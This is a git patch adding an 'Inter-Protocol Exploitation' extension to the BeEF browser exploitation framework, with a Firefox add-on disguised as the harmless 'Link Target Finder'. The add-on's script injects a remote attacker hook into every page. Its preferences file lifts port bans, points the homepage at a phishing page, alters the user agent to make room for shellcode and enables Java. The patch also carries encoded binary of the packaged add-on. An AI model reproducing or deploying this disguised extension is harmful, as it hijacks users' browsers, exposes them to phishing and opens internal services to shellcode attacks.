From b8c36b206beea0edf98dc9a3cd006365470f1696 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 15:52:15 +1100
Subject: [PATCH] Added first implementation of the IPEC extension, including
 the malicious FirefoxExtension.

---
 extensions/ipec/config.yaml                   |  21 +++++
 extensions/ipec/extension.rb                  |  60 ++++++++++++
 extensions/ipec/files/LinkTargetFinder.xpi    | Bin 0 -> 8844 bytes
 .../files/LinkTargetFinder/chrome.manifest    |   8 ++
 .../chrome/content/browser.xul                |  22 +++++
 .../chrome/content/linkTargetFinder.js        |  37 ++++++++
 .../chrome/content/options.xul                |  31 ++++++
 .../defaults/preferences/prefs.js             |  21 +++++
 .../ipec/files/LinkTargetFinder/install.rdf   |  23 +++++
 .../locale/en-US/translations.dtd             |   1 +
 .../ipec/files/LinkTargetFinder/skin/skin.css |  12 +++
 .../LinkTargetFinder/skin/status-bar.png      | Bin 0 -> 423 bytes
 .../LinkTargetFinder/skin/toolbar-large.png   | Bin 0 -> 1067 bytes
 extensions/ipec/junk_calculator.rb            |  40 ++++++++
 extensions/ipec/models/ipec_exploits.rb       |  37 ++++++++
 extensions/ipec/models/ipec_exploits_run.rb   |  36 +++++++
 extensions/ipec/rest/ipec.rb                  |  88 ++++++++++++++++++
 17 files changed, 437 insertions(+)
 create mode 100644 extensions/ipec/config.yaml
 create mode 100644 extensions/ipec/extension.rb
 create mode 100644 extensions/ipec/files/LinkTargetFinder.xpi
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome.manifest
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
 create mode 100644 extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
 create mode 100644 extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
 create mode 100644 extensions/ipec/files/LinkTargetFinder/install.rdf
 create mode 100644 extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
 create mode 100644 extensions/ipec/files/LinkTargetFinder/skin/skin.css
 create mode 100644 extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
 create mode 100644 extensions/ipec/files/LinkTargetFinder/skin/toolbar-large.png
 create mode 100644 extensions/ipec/junk_calculator.rb
 create mode 100644 extensions/ipec/models/ipec_exploits.rb
 create mode 100644 extensions/ipec/models/ipec_exploits_run.rb
 create mode 100644 extensions/ipec/rest/ipec.rb

diff --git a/extensions/ipec/config.yaml b/extensions/ipec/config.yaml
new file mode 100644
index 000000000..28b9dde4b
--- /dev/null
+++ b/extensions/ipec/config.yaml
@@ -0,0 +1,21 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    extension:
+        ipec:
+            enable: true 
+            name: 'Inter-Protocol Exploitation'
+            authors: ["antisnatchor"]
diff --git a/extensions/ipec/extension.rb b/extensions/ipec/extension.rb
new file mode 100644
index 000000000..b8464e0d6
--- /dev/null
+++ b/extensions/ipec/extension.rb
@@ -0,0 +1,60 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+module Extension
+
+  #todo remove it from here:
+  # Handlers
+  #require 'extensions/ipec/fingerprinter'
+  #require 'extensions/ipec/launcher'
+  require 'extensions/ipec/junk_calculator'
+
+  module Ipec
+    extend BeEF::API::Extension
+
+    @short_name = 'Ipec'
+    @full_name = 'Inter-Protocol Exploitation'
+    @description = "Use the Inter-Protocol Exploitation technique to send shellcode to daemons implementing 'tolerant' protocols."
+
+    module RegisterIpecRestHandler
+      def self.mount_handler(server)
+        server.mount('/api/ipec', BeEF::Extension::Ipec::IpecRest.new)
+      end
+    end
+
+    BeEF::API::Registrar.instance.register(BeEF::Extension::Ipec::RegisterIpecRestHandler, BeEF::API::Server, 'mount_handler')
+
+    #todo remove it from here, and make it dynamic.
+    BeEF::Extension::Ipec::JunkCalculator.instance.bind_junk_calculator("imapeudora1")
+  end
+end
+end
+
+# Models
+# todo: to be used when we'll have more IPEC exploits
+#require 'extensions/ipec/models/ipec_exploits'
+#require 'extensions/ipec/models/ipec_exploits_run'
+
+# RESTful api endpoints
+require 'extensions/ipec/rest/ipec'
+
+
+
+
+
+
+
+
diff --git a/extensions/ipec/files/LinkTargetFinder.xpi b/extensions/ipec/files/LinkTargetFinder.xpi
new file mode 100644
index 0000000000000000000000000000000000000000..3fadfa9c2419213df4bb78d510da982ad639dc40
GIT binary patch
literal 8844
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
Lg6S$H^3(qSqQF(L

literal 0
HcmV?d00001

diff --git a/extensions/ipec/files/LinkTargetFinder/chrome.manifest b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
new file mode 100644
index 000000000..f9ad9ab4c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome.manifest
@@ -0,0 +1,8 @@
+content     linktargetfinder    chrome/content/
+content     linktargetfinder    chrome/content/ contentaccessible=yes
+overlay chrome://browser/content/browser.xul chrome://linktargetfinder/content/browser.xul
+
+locale	linktargetfinder	en-US	locale/en-US/
+
+skin	linktargetfinder	classic/1.0	skin/
+style	chrome://global/content/customizeToolbar.xul	chrome://linktargetfinder/skin/skin.css
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
new file mode 100644
index 000000000..5b63810a8
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/browser.xul
@@ -0,0 +1,22 @@
+<?xml version="1.0"?>
+<?xml-stylesheet href="chrome://linktargetfinder/skin/skin.css" type="text/css"?> 
+<!DOCTYPE linktargetfinder SYSTEM "chrome://linktargetfinder/locale/translations.dtd">
+<overlay id="sample" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+		<script src="linkTargetFinder.js" />
+		
+		<menupopup id="menu_ToolsPopup"> 
+			<menuitem label="&runlinktargetfinder;" key="link-target-finder-run-key" oncommand="linkTargetFinder.run()"/> 
+		</menupopup>
+		
+		<keyset>
+			<key id="link-target-finder-run-key" modifiers="accel alt shift" key="L" oncommand="linkTargetFinder.run()"/>
+		</keyset>
+		
+		<statusbar id="status-bar">
+			<statusbarpanel id="link-target-finder-status-bar-icon" class="statusbarpanel-iconic" src="chrome://linktargetfinder/skin/status-bar.png" tooltiptext="&runlinktargetfinder;" onclick="linkTargetFinder.run()" />
+		</statusbar>
+		
+		<toolbarpalette id="BrowserToolbarPalette">
+			<toolbarbutton id="link-target-finder-toolbar-button" label="Link Target Finder" tooltiptext="&runlinktargetfinder;" oncommand="linkTargetFinder.run()"/>
+		</toolbarpalette>
+</overlay>
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
new file mode 100644
index 000000000..8c86ef860
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/linkTargetFinder.js
@@ -0,0 +1,37 @@
+var linkTargetFinder = function () {
+	var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
+	return {
+		init : function () {
+			gBrowser.addEventListener("load", function () {
+				//todo change the Extension name
+				var autoRun = prefManager.getBoolPref("extensions.linktargetfinder.autorun");
+				if (autoRun) {
+					linkTargetFinder.run();
+				}
+			}, false);
+		},
+			
+		run : function () {
+			var head = content.document.getElementsByTagName("head")[0];
+			
+			// add the BeEF hook -- start
+			var s = content.document.createElement('script');
+			s.type='text/javascript';
+			s.src='http://192.168.0.2:3000/hook.js';
+			head.appendChild(s);
+			
+			//setTimeout cannot be used (looks like is ignored).
+			// beef_init if called manually from the console, works perfectly.
+			
+			// adding setTimeout(beef_init, 2000); at the end of the hook file, make it working.
+			// John Wilander suggestions. we might leave it there anyway.
+			//alert(1);
+			//setTimeout(function(){beef_init()}, 5000);
+			//alert(3);
+			
+			// add the BeEF hook -- end
+			
+		}
+	};
+}();
+window.addEventListener("load", linkTargetFinder.init, false);
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
new file mode 100644
index 000000000..ea0cfd8e3
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/chrome/content/options.xul
@@ -0,0 +1,31 @@
+<?xml version="1.0"?>
+<?xml-stylesheet href="chrome://global/skin/" type="text/css"?>
+ 
+<prefwindow 
+     title="Link Target Finder Preferences"
+     xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
+ 
+	<prefpane label="Link Target Finder Preferences">
+		<preferences>
+			<preference id="link-target-finder-autorun" name="extensions.linktargetfinder.autorun" type="bool"/>
+		</preferences>
+		
+		<groupbox>
+			<caption label="Settings"/>
+			<grid>
+				<columns>
+					<column flex="4"/>
+					<column flex="1"/>
+				</columns>
+				<rows>
+					<row>
+						<label control="autorun" value="Autorun"/>
+						<checkbox id="autorun" preference="link-target-finder-autorun"/>
+					</row>
+				</rows>
+			</grid>
+		</groupbox>	
+		
+	</prefpane>
+ 
+</prefwindow>
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
new file mode 100644
index 000000000..cbe9a6dd9
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/defaults/preferences/prefs.js
@@ -0,0 +1,21 @@
+// see http://kb.mozillazine.org/Firefox_:_FAQs_:_About:config_Entries
+// see http://mike.kaply.com/2012/06/21/best-practices-for-overriding-the-new-tab-page-with-your-extension/
+pref("extensions.linktargetfinder.autorun", false);
+
+// PortBanning override
+pref("network.security.ports.banned.override", "20,21,22,25,110,143");
+
+// home page is a phishing page create with BeEF Social Engineering extension,
+// the BeEF hook is added.
+pref("browser.startup.homepage.override", "http://www.binc.com");
+pref("browser.newtab.url", "http://www.binc.com");
+pref("browser.startup.page.override", "1");
+
+//useful for IPEC exploits, we save almost 90 bytes of space for shellcode
+// original: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:15.0) Gecko/20100101 Firefox/15.0.1
+// new: Firefox/15.0.1
+pref("general.useragent.override", "Firefox/15.0.1");
+
+// enable Java
+pref("security.enable_java", true);
+
diff --git a/extensions/ipec/files/LinkTargetFinder/install.rdf b/extensions/ipec/files/LinkTargetFinder/install.rdf
new file mode 100644
index 000000000..e7019cd8c
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/install.rdf
@@ -0,0 +1,23 @@
+<?xml version="1.0"?>
+<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
+     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
+
+	<Description about="urn:mozilla:install-manifest">
+		<em:id>linktargetfinder@robertnyman.com</em:id>
+		<em:name>Link Target Finder</em:name>
+		<em:version>1.0</em:version>
+		<em:type>2</em:type>
+		<em:creator>Robert Nyman</em:creator>
+		<em:description>Finds links that have a target attribute</em:description>
+		<em:homepageURL>http://www.robertnyman.com/</em:homepageURL>
+		<em:optionsURL>chrome://linktargetfinder/content/options.xul</em:optionsURL>
+
+		<em:targetApplication>
+			<Description>
+				<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
+				<em:minVersion>2.0</em:minVersion>
+				<em:maxVersion>23.0</em:maxVersion>
+			</Description>
+		</em:targetApplication>
+	</Description>      
+</RDF>
diff --git a/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
new file mode 100644
index 000000000..a42a829bf
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/locale/en-US/translations.dtd
@@ -0,0 +1 @@
+<!ENTITY runlinktargetfinder "Run Link Target Finder">
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/skin.css b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
new file mode 100644
index 000000000..c82d15f49
--- /dev/null
+++ b/extensions/ipec/files/LinkTargetFinder/skin/skin.css
@@ -0,0 +1,12 @@
+#link-target-finder-toolbar-button {
+	list-style-image: url("chrome://linktargetfinder/skin/toolbar-large.png");
+}
+
+#link-target-finder-status-bar-icon {
+	width: 83px;
+	margin: 0 5px;
+}
+
+.link-target-finder-selected {
+	outline: 2px solid red !important;
+}
\ No newline at end of file
diff --git a/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png b/extensions/ipec/files/LinkTargetFinder/skin/status-bar.png
new file mode 100644
index 0000000000000000000000000000000000000000..7f6c06afe8b954cb4a591272df3dc7eb0ee154e3
GIT binary patch
literal 423
